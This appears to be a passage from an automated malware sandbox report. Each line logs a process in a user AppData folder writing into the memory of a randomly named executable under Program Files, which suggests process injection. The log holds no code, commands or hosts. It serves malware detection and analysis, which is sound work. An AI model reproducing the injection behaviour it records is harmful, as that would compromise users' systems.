Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A81BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2970000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29B1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29B178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29B1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29B1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B61778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B6178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B61BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B61BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 27E0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2821778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 282178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2821BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2821BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2210000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2251778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 225178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2251BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2251BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2880000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 28C1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 28C178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 28C1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 28C1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11E0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1221778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 122178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1221BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1221BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DA0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DE1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DE178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DE1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DE1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2711778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 271178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2711BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2711BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2580000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25C1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25C178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25C1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25C1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C81778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C8178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C81BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C81BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25F1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25F178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25F1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25F1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F10000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F51778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F5178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F51BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F51BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 700000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 741778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 74178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 741BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 741BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C70000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CB1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CB178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CB1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CB1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2610000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2651778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 265178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2651BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2651BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 6D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 711778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 71178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 711BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 711BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1130000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1171778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 117178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1171BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1171BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 9D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: A11778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: A1178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: A11BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: A11BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: B90000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: BD1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: BD178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: BD1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: BD1BF4	Jump to behavior
